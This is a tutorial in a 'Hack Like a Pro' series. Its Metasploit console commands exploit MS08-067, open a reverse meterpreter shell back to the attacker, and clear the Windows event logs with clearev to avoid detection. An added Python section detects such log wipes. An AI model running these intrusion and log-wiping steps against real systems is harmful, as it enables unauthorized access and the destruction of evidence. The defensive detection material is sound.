Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected

Apr 12, 2013 11:07 PM
May 26, 2016 07:26 PM

Welcome back, my greenhorn hackers!

Congratulations on your successful hack that saved the world from nuclear annihilation at the hands of our little, bellicose, Twinkie-eating dictator. The rest of the world may not know what you did, but I do. Good job!


Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.

So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.

Step 1: Compromise His System Again

Let's start with the same hack we used to get into the dictator's computer initially:

exploit/windows/smb/ms08_067_netapi

But instead of using the VNC payload, we will load the Meterpreter payload. Type:

  • msf > use exploit/windows/smb/ms08_067_netapi

Before we move on, let's learn a bit more about this exploit. Type:

  • msf exploit(ms08_067_netapi) > info

This prints basic information about the module. The hack exploits a parsing flaw in the path canonicalization code of NetAPI32.dll, reachable over SMB through the Server service: a crafted path overflows a stack buffer and hands execution to a payload of our choosing, which in this case is the Meterpreter.


Now we load the payload by typing:

  • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Now that we have the exploit and payload set, we need to set the options. For this exploit and payload that means LHOST (us, the attacker: the address the reverse connection calls back to) and RHOST (the victim, our belligerent dictator's computer). Set each one to the matching IP address with set LHOST and set RHOST.


Step 2: Take Control of His Computer

Now that we have everything set to take control, we just type:

  • msf exploit(ms08_067_netapi) > exploit

If we are successful, we should see a Meterpreter prompt on our screen. The exploited Server service runs as SYSTEM, so we now have total control of his system!


At the meterpreter prompt, we now type:

  • meterpreter > clearev

This command clears the Application, System and Security event logs on our bellicose dictator's computer, so the local record of what we did is gone. One caveat before you rely on it: opening the event viewer on his computer would not show the logs completely empty. Windows logs the act of clearing (event 517 in the Security log on XP/2003, 1102 on Vista and later, and 104 in the System log for a cleared System or Application log), and anything already forwarded to a central log collector before the wipe is untouched. clearev removes the details of our visit; a wiped log is still a tell to an alert administrator.


This matters twice over: it keeps us from being found out, and it keeps our access alive. Once they know that someone has hacked his computer, it's likely they will take measures (patching the Server service, for a start) to keep us from returning to it.
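To see what the defender is left with after clearev, here is the check from the other side of the table. This Python is an added example written for this edit, not code from the original post or from Metasploit. It models Windows' own record of a log wipe (517/1102 in Security, 104 in System) and compares the host's surviving records against copies a collector received earlier. The event records, account names (VICTIM$, dictator), record IDs and timestamps are constructed for the example, and the function names are mine.

```python
"""Spot a wiped Windows event log.

Added example for this article, not code from the original post or from
Metasploit. Meterpreter's clearev calls ClearEventLog on the Application,
System and Security logs, and Windows records the wipe itself: on XP/2003 the
Security log gets event 517, on Vista and later the Security log gets 1102 and
the System log gets 104 for a cleared System or Application log. The event
records, account names and timestamps below are constructed for the example.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    log: str          # log the record lives in: Security, System or Application
    event_id: int
    time: datetime
    record_id: int    # EventRecordID; numbering restarts after a clear
    user: str         # SubjectUserName on 517/1102/104, account on other events
    message: str


# (log, event id) -> what the record proves
CLEAR_MARKERS = {
    ("Security", 517): "audit log cleared (Windows XP/2003)",
    ("Security", 1102): "Security log cleared",
    ("System", 104): "System or Application log cleared",
}


def find_log_clears(events):
    """Alerts for the records Windows writes when a log is cleared."""
    alerts = []
    for e in sorted(events, key=lambda e: e.time):
        what = CLEAR_MARKERS.get((e.log, e.event_id))
        if what:
            alerts.append({"time": e.time, "log": e.log, "id": e.event_id,
                           "by": e.user, "what": what})
    return alerts


def wiped_logs(events):
    """Logs whose oldest surviving record is the clear marker itself.

    After ClearEventLog nothing older than the marker survives, so the marker
    sitting at record 1 tells you the whole local history before that time is
    gone. A cleared Application log shows up only through the 104 in System.
    """
    oldest = {}
    for e in events:
        if e.log not in oldest or e.record_id < oldest[e.log].record_id:
            oldest[e.log] = e
    return sorted(log for log, e in oldest.items()
                  if (log, e.event_id) in CLEAR_MARKERS)


def missing_locally(forwarded, local):
    """Records a collector received that the host no longer has.

    clearev touches only the host. Anything already shipped by Windows Event
    Forwarding or a SIEM agent survives and shows exactly what was erased.
    """
    have = set(local)
    return [e for e in forwarded if e not in have]


T0 = datetime(2013, 4, 12, 22, 0)  # constructed base time


def _ev(log, event_id, minutes, record_id, user, message):
    return Event(log, event_id, T0 + timedelta(minutes=minutes),
                 record_id, user, message)


# Records the collector received before the wipe (constructed).
FORWARDED = [
    _ev("Security", 4624, 0, 4101, "dictator", "An account was successfully logged on."),
    _ev("System", 7036, 5, 2207, "SYSTEM", "The Server service entered the running state."),
    _ev("Security", 4624, 40, 4102, "ANONYMOUS LOGON", "An account was successfully logged on."),
    _ev("Application", 1704, 41, 913, "SYSTEM", "Security policy in the Group policy objects has been applied successfully."),
]

# What the host holds after clearev (constructed): each log restarts at record 1
# with the clear marker, and the Application log is empty until something logs.
LOCAL = [
    _ev("Security", 1102, 45, 1, "VICTIM$", "The audit log was cleared."),
    _ev("System", 104, 45, 1, "VICTIM$", "The System log file was cleared."),
    _ev("System", 104, 45, 2, "VICTIM$", "The Application log file was cleared."),
    _ev("Security", 4624, 50, 2, "dictator", "An account was successfully logged on."),
]


if __name__ == "__main__":
    for a in find_log_clears(LOCAL):
        print(f"{a['time']:%H:%M} {a['log']} {a['id']} by {a['by']}: {a['what']}")
    print("wiped:", wiped_logs(LOCAL))
    print("erased but still on the collector:", len(missing_locally(FORWARDED, LOCAL)))
```

Run as-is it reports three clear markers at 22:45, names Security and System as wiped, and counts four records that survive only on the collector. The lesson for the attacker is the same one the defender learns: clearev erases the details, not the fact of the erasure, and it never reaches logs that have already left the box.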

Now, make sure to come back for more hacking fun and games on our dictator's computer!

Photos by The Guardian, Matthew Collingwood/Shutterstock
